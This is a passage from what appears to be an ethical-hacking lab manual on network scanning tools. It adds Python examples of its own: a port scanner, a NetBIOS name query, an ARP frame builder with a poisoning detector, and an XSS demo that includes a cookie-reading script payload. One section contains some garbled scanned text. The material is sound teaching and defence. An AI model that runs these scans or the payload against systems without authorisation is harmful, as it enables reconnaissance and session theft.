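    """Return 'open', 'closed', 'filtered' or 'blocked-local'.

    open          handshake completed: a listener answered our SYN
    closed        the host answered with RST (ECONNREFUSED)
    filtered      nothing came back before the timeout: a firewall on the path
                  (or on the target) dropped the SYN or the reply
    blocked-local the local OS refused the connect() call itself; an outbound
                  Windows Firewall block rule typically surfaces this way
                  (WSAEACCES 10013, raised by Python as PermissionError)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except PermissionError:
        return "blocked-local"
    except OSError as exc:
        # From the client's point of view an unreachable network is a filter too.
        if exc.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH):
            return "filtered"
        raise
    finally:
        sock.close()


def service_name(port: int, proto: str = "tcp") -> str:
    """Keyword for the port from the OS services table (MegaPing's 'keyword' column)."""
    try:
        return socket.getservbyport(port, proto)
    except OSError:
        return "?"


def scan_ports(host: str, ports: Iterable[int],
               timeout: float = DEFAULT_TIMEOUT) -> Dict[int, str]:
    """Sequential connect scan: map each port to its state. MegaPing runs these
    probes in parallel; a sequential loop is slower but easier to rate-limit."""
    return {port: probe_port(host, port, timeout) for port in ports}


def demo_against_local_listener() -> Tuple[str, str]:
    """Offline self-test: open a listener on an ephemeral loopback port, probe it
    (expect 'open'), close it, probe again (expect 'closed'). A 'filtered' result
    needs a real packet filter in the path and cannot be produced on loopback."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    while_open = probe_port("127.0.0.1", port, timeout=1.0)
    listener.close()
    after_close = probe_port("127.0.0.1", port, timeout=1.0)
    return while_open, after_close


if __name__ == "__main__":
    print("self-test:", demo_against_local_listener())
    # Assumed target: only scan hosts you are authorised to test.
    for port, state in scan_ports("127.0.0.1", (21, 22, 80, 443)).items():
        print(f"{port:>5}/tcp  {service_name(port):<10} {state}")
```

Read the states the way a practitioner would: the ftp failure in step 40 is a "blocked-local" or "filtered" result depending on where the block sits, whereas a "closed" result means the packets reached the host and it answered. MegaPing's report shows only a service keyword and a risk label; keeping the raw state lets you tell a firewall from an absent service.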
FIGURE 15.10: MegaPing Port Scanning Report (in the lab run the report flags TCP 21 ftp and TCP 80 www-http as Elevated risk and several UDP ports such as echo and discard as Low)
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: MegaPing
Information Collected/Objectives Achieved:
■ IP scan range: 10.0.0.1 - 10.0.0.254
■ Performed actions: IP scanning, NetBIOS scanning, Traceroute, Port scanning
■ Result: list of active hosts, NetBIOS names, adapter addresses
Note: MegaPing's security scanner checks your network for potential vulnerabilities that might be used to attack it, and saves the information in security reports.
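Step 9 above shows what MegaPing's NetBIOS scanner returns for each host: its NetBIOS names and its adapter address. Under the hood that is a NetBIOS Node Status (NBSTAT) query to UDP port 137 and a parse of the reply, which carries the name table and the adapter's MAC in its statistics block (RFC 1001/1002). The following added example is not MegaPing's code; it builds the 50-byte wildcard NBSTAT request and parses a reply in Python. The sample reply is constructed by hand for offline use and is not a capture from the lab network; the host name ADMIN-PC and the 00-15-5D MAC prefix simply mirror what the lab report showed, and the transaction ID and timeout are assumptions.

```python
"""NetBIOS Node Status (NBSTAT) request builder and reply parser.
Added example; not MegaPing's implementation."""
import socket
import struct
from dataclasses import dataclass
from typing import List, Tuple

NBSTAT_TYPE = 0x0021
NBNS_PORT = 137


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 s14.1): 16 raw bytes (15-char name padded
    with spaces plus a suffix byte), each byte split into two nibbles mapped to
    'A'..'P', wrapped as one 32-byte DNS label. The node-status wildcard is
    '*' followed by 15 NUL bytes rather than spaces."""
    if name == "*":
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    encoded = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return bytes([32]) + encoded + b"\x00"


def build_nbstat_query(txid: int) -> bytes:
    """NBNS header (12 bytes) + one NBSTAT question for the wildcard name."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_netbios_name("*") + struct.pack(">HH", NBSTAT_TYPE, 0x0001)
    return header + question


@dataclass
class NetBIOSName:
    name: str
    suffix: int      # 0x00 workstation, 0x20 file server, 0x1B domain master, ...
    flags: int       # bit 15 set = group name, bits 13-14 = node type

    @property
    def is_group(self) -> bool:
        return bool(self.flags & 0x8000)


def parse_nbstat_response(data: bytes, expected_txid: int = None) -> Tuple[List[NetBIOSName], str]:
    """Return (name table, MAC as AA-BB-CC-DD-EE-FF) from an NBSTAT reply."""
    if len(data) < 12:
        raise ValueError("short NBNS header")
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if expected_txid is not None and txid != expected_txid:
        raise ValueError("transaction id mismatch")
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a response with an answer record")
    off = 12
    while True:  # skip the answer name: length-prefixed labels, or a pointer
        label_len = data[off]
        if label_len & 0xC0 == 0xC0:
            off += 2
            break
        off += 1
        if label_len == 0:
            break
        off += label_len
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT_TYPE:
        raise ValueError(f"unexpected RR type {rtype:#06x}")
    rdata = data[off:off + rdlen]
    names: List[NetBIOSName] = []
    pos = 1
    for _ in range(rdata[0]):            # NUM_NAMES entries of 18 bytes each
        entry = rdata[pos:pos + 18]
        if len(entry) < 18:
            raise ValueError("truncated name entry")
        names.append(NetBIOSName(entry[:15].decode("ascii", "replace").rstrip(),
                                 entry[15], struct.unpack(">H", entry[16:18])[0]))
        pos += 18
    unit_id = rdata[pos:pos + 6]         # first field of the statistics block
    if len(unit_id) < 6:
        raise ValueError("truncated statistics block")
    return names, "-".join(f"{b:02X}" for b in unit_id)


def query_node_status(host: str, timeout: float = 2.0, txid: int = 0x1234):
    """Send the wildcard NBSTAT query to host:137 and parse the reply (live)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_nbstat_query(txid), (host, NBNS_PORT))
        data, _ = sock.recvfrom(4096)
    finally:
        sock.close()
    return parse_nbstat_response(data, expected_txid=txid)


def constructed_sample_response(txid: int = 0x1234) -> bytes:
    """Hand-built reply (constructed, not captured): three names and a MAC."""
    entries = [(b"ADMIN-PC", 0x00, 0x0400), (b"ADMIN-PC", 0x20, 0x0400),
               (b"WORKGROUP", 0x00, 0x8400)]
    rdata = bytes([len(entries)])
    for name, suffix, nflags in entries:
        rdata += name.ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += bytes.fromhex("00155D000701") + b"\x00" * 40   # UNIT_ID + zeroed stats
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr = encode_netbios_name("*") + struct.pack(">HHIH", NBSTAT_TYPE, 1, 0, len(rdata))
    return header + rr + rdata


if __name__ == "__main__":
    names, mac = parse_nbstat_response(constructed_sample_response(), 0x1234)
    print(mac, [(n.name, hex(n.suffix), n.is_group) for n in names])
```

The suffix byte is the part worth reading in a report: 0x20 means the host offers file sharing, 0x1B marks a domain master browser, and group names (bit 15 of the flags) are workgroups or domains rather than hosts. Windows answers these queries only when NetBIOS over TCP/IP is enabled and UDP/137 is not filtered, so a silent host is not necessarily down.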
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. How does MegaPing detect security vulnerabilities on the network?
2. Examine the report generation of MegaPing.
Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
Detect, Delete and Block Google Cookies Using G-Zapper
G-Zapper is a utility to block Google cookies, clean Google cookies, and help you stay anonymous while searching online.
Lab Scenario
You learned in the previous lab that MegaPing's security scanner checks your network for potential vulnerabilities that might be used to attack it, and saves the information in security reports. It provides detailed information about all computers and network appliances: it scans your entire network and reports open shared resources, open ports, services/drivers active on each computer, key registry entries, users and groups, trusted domains, printers, etc. Scan results can be saved in HTML or TXT reports, which can be used to secure your network. As an administrator, you can organize safety measures such as shutting down unnecessary ports and closing shares to block attackers from intruding into the network.
As another aspect of prevention you can use G-Zapper, which blocks Google cookies, cleans Google cookies, and helps you stay anonymous while searching online. This way you can protect your identity and search history. Bear in mind that removing the cookie only breaks the link between searches that the cookie's identifier provided; your IP address and browser fingerprint can still be used to correlate them.
Lab Objectives
This lab explains how G-Zapper automatically detects and cleans the Google cookie each time you use your web browser.
Lab Environment
To carry out the lab, you need:
■ G-Zapper, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Anonymizers\G-Zapper
■ You can also download the latest version of G-Zapper from http://www.dummysoftware.com/
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ Install G-Zapper on Windows Server 2012 by following the wizard-driven installation steps
■ Administrative privileges to run tools
■ A computer running Windows Server 2012
Lab Duration
Time: 10 Minutes
Overview of G-Zapper
G-Zapper helps protect your identity and search history. G-Zapper reads the Google cookie installed on your PC, displays the date it was installed, determines how long your searches have been tracked, and displays your Google searches. G-Zapper can automatically delete the Google search cookie or block it entirely from future installation.
Lab Tasks
TASK 1: Detect & Delete Google Cookies
1. Launch the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
FIGURE 16.1: Windows Server 2012 - Desktop view
2. Click the G-Zapper app to open the G-Zapper window.
FIGURE 16.2: Windows Server 2012 - Apps
3. The G-Zapper main window appears as shown in the following screenshot. In the lab run it reported that a Google tracking ID existed on the PC (Chrome ID 6b4b4d9fe5c60cc1), that Google had installed the cookie on Wednesday, September 05, 2012 at 01:54:46 AM, that searches had been tracked for 13 hours, and that no Google searches were found in Internet Explorer or Firefox.
FIGURE 16.3: G-Zapper main window
4. To delete the Google search cookie, click the Delete Cookie button; a window appears giving the location of the deleted cookie. Click OK.
Note: G-Zapper is compatible with Windows 95, 98, ME, NT, 2000, XP, Vista and Windows 7.
The dialog reports that the Google search cookie was removed and will be re-created with a new ID upon visiting www.google.com, and that the cookie was located at (Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite. A new cookie is generated on your next visit to Google, breaking the chain that relates your searches.
FIGURE 16.4: Deleting search cookies
5. To block the Google search cookie, click the Block Cookie button. A dialog asks whether you want to manually block the Google cookie, warning that Gmail and other Google services will be unavailable while the cookie is manually blocked and that, if you use those services, it is better not to block the cookie and instead let G-Zapper clean it regularly. Click Yes.
NoYes How T0 block and delete the Google search cookie, click the Block Cookie bUton (Gmail andAdsense w l be unavaiaWe with the cookie blocked) http //www dummvsoftware,com RegisterSettingsTest GoogleBlock CookieDelete Cookie FIGURE 16.5: Block Google cookie 6. It will show a message diat the Google cookie has been blocked. To verify, click OK ‫ס‬ The tiny tray icon runs in the background, takes up very little sp ace and can notify you by sound & animate when the Google cookie is blocked. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 246
FIGURE 16.6: Block Google cookie (2)

7. To test the Google cookie that has been blocked, click the Test Google button.

8. Your default web browser will now open to Google's Preferences page. Click OK.

FIGURE 16.7: Cookies disabled message (the Preferences page reports "Your cookies seem to be disabled. Setting preferences will not work until you enable cookies in your browser.")

9. To view the deleted cookie information, click the Settings button, and then click View Log in the Cleaned Cookies Log section.

■ G-Zapper can also clean your Google search history in Internet Explorer and Mozilla Firefox. It's far too easy for someone using your PC to get a glimpse of what you've been searching for.
FIGURE 16.8: Viewing the deleted logs (G-Zapper Settings dialog: Sounds, Google Analytics Tracking, and the Cleaned Cookies Log section with its View Log and Clear Log buttons)

■ You can simply run G-Zapper, minimize the window, and enjoy your enhanced search privacy.

10. The deleted cookies information opens in Notepad (cookiescleaned - Notepad):

(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 10:42:13 AM
(Chrome) C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cookies Friday, August 31, 2012 11:04:20 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Friday, August 31, 2012 11:06:23 AM
(Firefox) C:\Users\Administrator\Application Data\Mozilla\Firefox\Profiles\5vcc40ns.default\cookies.sqlite Wednesday, September 05, 2012 02:52:38 PM

FIGURE 16.9: Deleted logs report

Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: G-Zapper
Information Collected/Objectives Achieved:
Action Performed:
■ Detect the cookies
■ Delete the cookies
■ Block the cookies
Result: Deleted cookies are stored in C:\Users\Administrator\Application Data

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Examine how G-Zapper automatically cleans Google cookies.
2. Check to see if G-Zapper is blocking cookies on sites other than Google.

Internet Connection Required
☑ Yes ☐ No

Platform Supported
☑ Classroom ☐ iLabs
Lab
Scanning the Network Using the Colasoft Packet Builder

The Colasoft Packet Builder is a useful tool for creating custom network packets.

Lab Scenario
In the previous lab you have learned how you can detect, delete, and block cookies. Attackers exploit the XSS vulnerability, which involves an attacker pushing malicious JavaScript code into a web application. When another user visits a page with that malicious code in it, the user's browser will execute the code. The browser has no way of telling the difference between legitimate and malicious code. Injected code is another mechanism that an attacker can use for session hijacking: by default, cookies stored by the browser can be read by JavaScript code. The injected code can read a user's cookies and transmit those cookies to the attacker.
As an expert ethical hacker and penetration tester, you should be able to prevent such attacks by validating all headers, cookies, query strings, form fields, and hidden fields; encoding input and output; filtering meta characters in the input; and using a web application firewall to block the execution of malicious scripts.
Another method of vulnerability checking is to scan a network using the Colasoft Packet Builder. In this lab, you will learn about sniffing network packets, performing ARP poisoning, spoofing the network, and DNS poisoning.

Lab Objectives
The objective of this lab is to reinforce concepts of network security policy, policy enforcement, and policy audits.
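The session-hijacking path the scenario describes, and the defenses it lists (form-field validation, output encoding, and keeping the session cookie out of reach of script), as an added example in Python that is not part of the lab manual or of any tool it covers. The comment text, the user-name field whitelist and the cookie name sid are constructed for illustration; the vulnerable renderer is shown beside the hardened one.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed sample input: a "comment" a visitor submitted to a page. A browser
# that receives it unencoded executes the script, which can read document.cookie
# (the mechanism the scenario describes).
INJECTED_COMMENT = '<script>alert(document.cookie)</script>'

# Whitelist for a hypothetical user-name form field: letters, digits and
# underscore only. Validation rejects meta characters outright instead of
# trying to strip them.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def validate_username(field: str) -> bool:
    """Return True only if the form field matches the whitelist."""
    return USERNAME_RE.fullmatch(field) is not None


def render_comment_unsafe(comment: str) -> str:
    """The vulnerable 'before': user input is copied into the page verbatim."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """The hardened 'after': output encoding turns <, >, &, and quotes into
    entities, so the browser displays the text instead of executing it."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    """Build the Set-Cookie header for the session cookie.

    HttpOnly keeps the cookie out of document.cookie, so even a script that
    does run cannot read it; Secure and SameSite limit where it is sent.
    """
    cookie = SimpleCookie()
    cookie["sid"] = session_id
    cookie["sid"]["httponly"] = True
    cookie["sid"]["secure"] = True
    cookie["sid"]["samesite"] = "Strict"
    cookie["sid"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


def contains_active_script(rendered_html: str) -> bool:
    """Detection check a reviewer or a WAF rule can apply to rendered output:
    does an unencoded <script ...> tag survive in the response body?"""
    return re.search(r"<\s*script\b", rendered_html, re.IGNORECASE) is not None


if __name__ == "__main__":
    print(render_comment_unsafe(INJECTED_COMMENT))   # script tag survives
    print(render_comment_safe(INJECTED_COMMENT))     # entities only
    print(session_cookie_header("constructed-session-id"))
```

The three functions map onto the three defenses the scenario names: validate_username is the field validation, render_comment_safe is the output encoding, and session_cookie_header shows that a cookie flagged HttpOnly is not exposed to document.cookie even when a script does execute.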
Lab Environment
In this lab, you need:
■ Colasoft Packet Builder, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Custom Packet Creator\Colasoft Packet Builder
■ A computer running Windows Server 2012 as host machine
■ Windows 8 running on a virtual machine as target machine
■ You can also download the latest version of Advanced Colasoft Packet Builder from the link http://www.colasoft.com/download/products/download_packet_builder.php
■ If you decide to download the latest version, then screenshots shown in the lab might differ.
■ A web browser with Internet connection running in the host machine

Lab Duration
Time: 10 Minutes

Overview of Colasoft Packet Builder
Colasoft Packet Builder lets you create custom network packets. This tool can be used to verify network protection against attacks and intruders. Colasoft Packet Builder features a decoding editor that lets users edit specific protocol field values much more easily. Users are also able to edit decoding information in two editors: Decode Editor and Hex Editor. Users can select any one of the provided templates: Ethernet Packet, IP Packet, ARP Packet, or TCP Packet.

Lab Tasks
Task 1: Scanning Network
1. Install and launch the Colasoft Packet Builder.
2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 17.1: Windows Server 2012 - Desktop view

3. Click the Colasoft Packet Builder 1.0 app to open the Colasoft Packet Builder window.

■ You can download Colasoft Packet Builder from http://www.colasoft.com.
FIGURE 17.2: Windows Server 2012 - Apps

4. The Colasoft Packet Builder main window appears.

FIGURE 17.3: Colasoft Packet Builder main screen

5. Before starting your task, check that the Adapter settings are set to default and then click OK.

■ Operating system requirements: Windows Server 2003 and 64-bit Edition, Windows 2008 and 64-bit Edition, Windows 7 and 64-bit Edition.

FIGURE 17.4: Colasoft Packet Builder Adapter settings (the Select Adapter dialog lists Physical Address, Link Speed, Max Frame Size, IP Address, Default Gateway, and Adapter Status; in the lab the adapter shows IP address 10.0.0.7/255.255.255.0 and default gateway 10.0.0.1)
6. To add or create the packet, click Add in the menu section.

FIGURE 17.5: Colasoft Packet Builder creating the packet

7. When an Add Packet dialog box pops up, select the template (in this lab, ARP Packet, with a Delta Time of 0.1 second) and click OK.

■ There are two ways to create a packet: Add and Insert. The difference between these is the newly added packet's position in the Packet List. The new packet is listed as the last packet in the list if added, but after the current packet if inserted.

■ Colasoft Packet Builder supports *.cscpkt (Capsa 5.x and 6.x Packet File) and *.cpf (Capsa 4.0 Packet File) formats. You may also import data from *.cap (Network Associates Sniffer packet files), *.pkt (EtherPeek v7/TokenPeek/AiroPeek v9/OmniPeek v9 packet files), *.dmp (TCP DUMP), and *.rawpkt (raw packet files).

FIGURE 17.6: Colasoft Packet Builder Add Packet dialog box

8. You can view the added packets list on the right-hand side of your window.

Task 2: Decode Editor
9. Colasoft Packet Builder allows you to edit the decoding information in the two editors: Decode Editor and Hex Editor.

FIGURE 17.7: Colasoft Packet Builder Packet List (Packets: 1, Selected: 1; packet 1, Delta Time 0.100000, Source 00:00:00:00:00:00)
The Decode Editor shows the fields of the ARP packet created from the template (the bracketed values are byte offset/length):

Packet: Num: 000001, Length: 64
Ethernet Type II [0/14]
  Destination Address: FF:FF:FF:FF:FF:FF [0/6]
  Source Address: 00:00:00:00:00:00 [6/6]
  Protocol: 0x0806 (ARP) [12/2]
ARP - Address Resolution Protocol [14/28]
  Hardware type: 1 (Ethernet) [14/2]
  Protocol Type: 0x0800 [16/2]
  Hardware Address Length: 6 [18/1]
  Protocol Address Length: 4 [19/1]
  Type: 1 (ARP Request) [20/2]
  Source Physical: 00:00:00:00:00:00 [22/6]
  Source IP: 0.0.0.0 [28/4]
  Destination Physical: 00:00:00:00:00:00 [32/6]
  Destination IP: 0.0.0.0 [38/4]
Extra Data [42/18]
  Number of Bytes: 18 bytes [42/18]
  FCS: 0xF577BDD9

■ Burst Mode Option: If you check this option, Colasoft Packet Builder sends packets one after another without intermission. If you want to send packets at the original delta time, do not check this option.

FIGURE 17.8: Colasoft Packet Builder Decode Editor

Hex Editor (Total 60 bytes):
0000  FF FF FF FF FF FF 00 00 00 00 00 00 08 06
000E  00 01 08 00 06 04 00 01 00 00 00 00 00 00
001C  00 00 00 00 00 00 00 00 00 00 00 00 00 00
002A  00 00 00 00 00 00 00 00 00 00 00 00 00 00
0038  00 00 00 00

FIGURE 17.9: Colasoft Packet Builder Hex Editor

10. To send all packets at one time, click Send All from the menu bar.
11. Check the Burst Mode option in the Send All Packets dialog window, and then click Start.

■ Option, Loop Sending: This defines the number of times the sending is repeated, one time by default. Enter zero if you want to keep sending packets until you pause or stop it manually.

FIGURE 17.10: Colasoft Packet Builder Send All button
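The frame that the Decode Editor and Hex Editor show above, built and parsed in Python as an added example that is not part of the lab manual or of Colasoft's software. The hex dump is the 60-byte one printed above (the 4-byte FCS is not included, which is why the editor reports Length 64 for 60 bytes of data); the MAC and IP addresses in the conflict-detection part are constructed. The same parser lets a defender spot the ARP poisoning the lab mentions, whose basic signature is one IP address claimed by two different hardware addresses.

```python
import struct
from collections import defaultdict

# The 60-byte frame as shown in the Colasoft Hex Editor (FCS not included).
PAGE_HEX_DUMP = (
    "FF FF FF FF FF FF 00 00 00 00 00 00 08 06 "
    "00 01 08 00 06 04 00 01 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00"
)
PAGE_FRAME = bytes.fromhex(PAGE_HEX_DUMP)

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ETH_MIN_FRAME = 60  # minimum Ethernet frame size, FCS excluded


def mac_to_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def bytes_to_mac(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(part) for part in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp_frame(dst_mac, src_mac, opcode, sender_mac, sender_ip,
                    target_mac, target_ip) -> bytes:
    """Ethernet II header + 28-byte ARP body, zero-padded to 60 bytes
    (the padding is what the Decode Editor lists as Extra Data)."""
    ethernet = mac_to_bytes(dst_mac) + mac_to_bytes(src_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += mac_to_bytes(sender_mac) + ip_to_bytes(sender_ip)
    arp += mac_to_bytes(target_mac) + ip_to_bytes(target_ip)
    frame = ethernet + arp
    return frame + b"\x00" * max(0, ETH_MIN_FRAME - len(frame))


def parse_arp_frame(frame: bytes) -> dict:
    """Decode the same fields the Colasoft Decode Editor lists."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not an ARP frame: ethertype 0x{ethertype:04X}")
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol combination")
    return {
        "dst_mac": bytes_to_mac(frame[0:6]),
        "src_mac": bytes_to_mac(frame[6:12]),
        "opcode": opcode,
        "sender_mac": bytes_to_mac(frame[22:28]),
        "sender_ip": bytes_to_ip(frame[28:32]),
        "target_mac": bytes_to_mac(frame[32:38]),
        "target_ip": bytes_to_ip(frame[38:42]),
        "extra_bytes": len(frame) - 42,   # padding after the ARP body
    }


def find_arp_conflicts(frames) -> dict:
    """Return {ip: set of MACs} for every IP that ARP replies attribute to more
    than one hardware address, the basic signature of ARP cache poisoning."""
    claims = defaultdict(set)
    for frame in frames:
        try:
            arp = parse_arp_frame(frame)
        except ValueError:      # non-ARP or malformed frames are skipped
            continue
        if arp["opcode"] == ARP_REPLY:
            claims[arp["sender_ip"]].add(arp["sender_mac"])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


# Constructed traffic: the gateway answers for 10.0.0.1, then a second host
# answers for the same address with a different MAC.
SAMPLE_FRAMES = [
    build_arp_frame("FF:FF:FF:FF:FF:FF", "00:11:22:33:44:55", ARP_REQUEST,
                    "00:11:22:33:44:55", "10.0.0.7", "00:00:00:00:00:00", "10.0.0.1"),
    build_arp_frame("00:11:22:33:44:55", "AA:AA:AA:AA:AA:01", ARP_REPLY,
                    "AA:AA:AA:AA:AA:01", "10.0.0.1", "00:11:22:33:44:55", "10.0.0.7"),
    build_arp_frame("00:11:22:33:44:55", "BB:BB:BB:BB:BB:02", ARP_REPLY,
                    "BB:BB:BB:BB:BB:02", "10.0.0.1", "00:11:22:33:44:55", "10.0.0.7"),
]


if __name__ == "__main__":
    print(parse_arp_frame(PAGE_FRAME))
    print(find_arp_conflicts(SAMPLE_FRAMES))
```

Building the template values (broadcast destination, all-zero addresses, opcode 1) reproduces the page's hex dump byte for byte, which is a useful check that the offsets in the Decode Editor have been read correctly.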
■ Select a packet from the packet list to activate the Send All button.

FIGURE 17.11: Colasoft Packet Builder Send All Packets

12. Click Start.

FIGURE 17.12: Colasoft Packet Builder Send All Packets (the dialog shows the Adapter, Realtek PCIe GBE Family Controller; the Burst Mode, Loop Sending, and Delay Between Loops options; and Sending Information: Total Packets 1, Packets Sent 1)

■ The progress bar presents an overview of the sending process you are engaged in at the moment.

13. To export the packets sent, from the File menu select File -> Export -> All Packets.
FIGURE 17.13: Export All Packets option

FIGURE 17.14: Select a location to save the exported file (Save As dialog, file name Packets.cscpkt, type Colasoft Packet File (v6) (*.cscpkt))

FIGURE 17.15: Colasoft Packet Builder exporting packet

Lab Analysis
Analyze and document the results related to the lab exercise.

Tool/Utility: Colasoft Packet Builder
Information Collected/Objectives Achieved:
Adapter Used: Realtek PCIe Family Controller
Selected Packet Name: ARP Packets
Result: Captured packets are saved in packets.cscpkt

■ Option, Packets Sent: This shows the number of packets sent successfully. Colasoft Packet Builder displays the packets sent unsuccessfully, too, if there is a packet not sent out.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Analyze how Colasoft Packet Builder affects your network traffic while analyzing your network.
2. Evaluate what types of instant messages Capsa monitors.
3. Determine whether the packet buffer affects performance. If yes, then what steps do you take to avoid or reduce its effect on software?

Internet Connection Required
☐ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs
Lab
Scanning Devices in a Network Using The Dude

The Dude automatically scans all devices within specified subnets, draws and lays out a map of your networks, monitors services of your devices, and alerts you in case some service has problems.

Lab Scenario
In the previous lab you learned how packets can be captured using Colasoft Packet Builder. Attackers too can sniff, capture, and analyze packets from a network and obtain specific network information. The attacker can disrupt communication between hosts and clients by modifying system configurations, or through the physical destruction of the network.
As an expert ethical hacker, you should be able to gather information on an organization's network to check for vulnerabilities and fix them before an attacker gets to compromise the machines using those vulnerabilities. If you detect any attack that has been performed on a network, immediately implement preventative measures to stop any additional unauthorized access.
In this lab you will learn to use The Dude tool to scan the devices in a network, and the tool will alert you if any attack has been performed on the network.

Lab Objectives
The objective of this lab is to demonstrate how to scan all devices within specified subnets, draw and lay out a map of your networks, and monitor services on the network.

Lab Environment
To carry out the lab, you need:
■ The Dude, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\The Dude
■ You can also download the latest version of The Dude from http://www.mikrotik.com/thedude.php
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click The Dude installer and follow the wizard-driven installation steps to install The Dude
■ Administrative privileges to run tools

Lab Duration
Time: 10 Minutes

Overview of The Dude
The Dude network monitor is a new application that can dramatically improve the way you manage your network environment. It will automatically scan all devices within specified subnets, draw and lay out a map of your networks, monitor services of your devices, and alert you in case some service has problems.

Lab Tasks
Task 1: Launch The Dude
1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 18.1: Windows Server 2012 - Desktop view

2. In the Start menu, to launch The Dude, click The Dude icon.
FIGURE 18.2: Windows Server 2012 - Start menu

3. The main window of The Dude will appear.

FIGURE 18.3: Main window of The Dude (admin@localhost - The Dude 4.0beta3)

4. Click the Discover button on the toolbar of the main window.

FIGURE 18.4: Select Discover button

5. The Device Discovery window appears.
FIGURE 18.6: Device Discovery window (General tab: Scan Networks, Agent, Add Networks To Auto Scan, Black List, Device Name Preference, Discovery Mode with the choices fast (scan by ping) and reliable (scan each service), Recursive Hops, and Layout Map After Discovery Complete; the other tabs are Services, Device Types, and Advanced)

6. In the Device Discovery window, specify the Scan Networks range (10.0.0.0/24 in this lab), select default from the Agent drop-down list, select DNS, SNMP, NETBIOS, IP from the Device Name Preference drop-down list, and click Discover.

FIGURE 18.7: Selecting device name preference

7. Once the scan is complete, all the devices connected to a particular network will be displayed.
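The discovery configured in step 6, reduced to its building blocks, as an added example in Python that is not part of the lab manual or of MikroTik's software: expanding the 10.0.0.0/24 Scan Networks entry into host addresses, the "reliable (scan each service)" check (a TCP connection attempt per service with a timeout, which is the assumption made here about what that mode does), the Device Name Preference order DNS, SNMP, NETBIOS, IP, and the alert on a service that does not answer. Because it has to run offline, the monitored device is a constructed listener on 127.0.0.1 and the name table is constructed too.

```python
import ipaddress
import socket
import threading

# Device Name Preference as selected in the lab: first source that yields a name wins.
NAME_PREFERENCE = ("DNS", "SNMP", "NETBIOS", "IP")


def hosts_in_network(cidr: str) -> list:
    """Expand a Scan Networks entry such as 10.0.0.0/24 into host addresses
    (network and broadcast addresses excluded)."""
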